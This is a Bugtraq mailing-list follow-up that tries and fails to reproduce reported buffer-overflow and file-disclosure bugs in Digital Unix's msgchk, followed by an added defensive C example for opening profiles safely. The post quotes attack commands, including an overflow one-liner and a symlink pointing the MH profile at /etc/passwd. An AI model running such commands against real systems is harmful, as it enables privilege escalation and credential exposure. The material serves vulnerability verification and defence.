[Resend: my original reply to Bugtraq on Monday 10th has not appeared, and I
haven't seen any other followup; this time I've replaced all weird > ASCII 127
characters in my screen dumps by X's in case that prevented my email's handling
by some MTA somewhere]

On 10 September 2001 03:54, SeungHyun Seo said :

> there were multiple vulnerabilities in "/usr/bin/mh/msgchk" on digital
> unix 4.0x. it's a mail utility - check for messages (only available within the
> message handling system, mh)

[...]

> /usr/bin/mh/msgchk is affected by a buffer overflow vulnerability
>
> -- snip --
> $ /usr/bin/mh/msgchk `perl -e 'print "A"x9000'`
> AAAAAAAAAAAAA ... ...
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA :
> msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAA ... ...
> AAAAAAAAAAAAAAAAAAAAAAA
> Memory fault(coredump)
> -- snip --

NOT confirmed. On my system (Digital Unix 4.0D, Patch Kit 5) this gives me :

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... AAAAAAAAAAAAAA :
msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

followed by another command prompt.

And the exploit doesn't work :

/usr/users/joesoap/bin>cc msgbreak.c -o msgbreak -std
/usr/users/joesoap/bin>msgbreak
I'm going to create the standard MH path for you.
AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
....
[lots of pairs of "G" followed by "y" with an upsilon accent]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
....
[even more A's]
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA XX :
msgchk: no such user as AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
/usr/users/joesoap/bin>whoami
joesoap
/usr/users/joesoap/bin>uname -a
OSF1 mybox V4.0 878 alpha

(Lines wrapped for readability, and unprintable blobs replaced by X's.)

Looks like there must have been a patch for this somewhere in Patch Kits 1
thru 5. Or maybe the hole only exists *prior* to 4.0D.

Part 2:

> Next , /usr/bin/mh/msgchk has a vulnerability that anyone can read 1 line
> of an unprivileged file on the system. it's an old bug on redhat linux 2.0,
> but it also works on digital unix 4.0x

This hole doesn't work either :

/usr/users/joesoap>ln -sf /etc/passwd ./~mh_profile
/usr/users/joesoap>/usr/bin/mh/msgchk
joesoap : No file-source mail waiting; last read on Wed, 27 Sep 2000 17:48:21 BST
/usr/users/joesoap>head -2 ./~mh_profile
root:xxxxxxxxxxxxx:0:1:system PRIVILEGED account:/:/bin/csh
nobody:*Nologin:65534:65534:anonymous NFS user:/:

Nick Boyce
EDS, Bristol, UK
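The second claim in the thread is the classic pattern of a privileged utility reading a profile file whose path the user controls, and then echoing part of it in a diagnostic. As an added example (not code from the original post, nor from MH), here is how such a program can open the profile without being redirected through a symlink; `open_user_profile` and `read_profile_first_line` are hypothetical names, and the code assumes a POSIX system with O_NOFOLLOW.

```c
/* Added example (not from the original post or from MH): how a setuid utility
 * can open a per-user profile without following a user-placed symlink.
 * Assumes POSIX O_NOFOLLOW/O_CLOEXEC (Linux, BSD, modern Solaris). */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: open `path` read-only only if it is a regular file,
 * is not a symlink, and is owned by the *real* uid of the invoking user.
 * Returns a descriptor, or -1 with errno = ELOOP (symlink, e.g. one pointing
 * at /etc/passwd) or EACCES (wrong owner / not a regular file). */
int open_user_profile(const char *path)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;                      /* ELOOP here for a symlink */
    struct stat st;
    if (fstat(fd, &st) < 0) {
        int e = errno; close(fd); errno = e; return -1;
    }
    /* Never lend elevated privilege: the profile must belong to the caller. */
    if (!S_ISREG(st.st_mode) || st.st_uid != getuid()) {
        close(fd);
        errno = EACCES;
        return -1;
    }
    return fd;
}

/* Read the first line of the profile (the line the reported bug would leak)
 * through the hardened open.  Returns 0 on success, -1 if the file is refused. */
int read_profile_first_line(const char *path, char *buf, size_t buflen)
{
    int fd = open_user_profile(path);
    if (fd < 0)
        return -1;
    FILE *fp = fdopen(fd, "r");
    if (fp == NULL) { close(fd); return -1; }
    if (fgets(buf, (int)buflen, fp) == NULL)
        buf[0] = '\0';
    fclose(fp);                         /* also closes fd */
    buf[strcspn(buf, "\n")] = '\0';     /* drop the trailing newline */
    return 0;
}
```

The ownership check matters as much as O_NOFOLLOW: a setuid program that drops neither its privilege nor the check can still be pointed at a root-owned regular file via a hard link on filesystems that permit it.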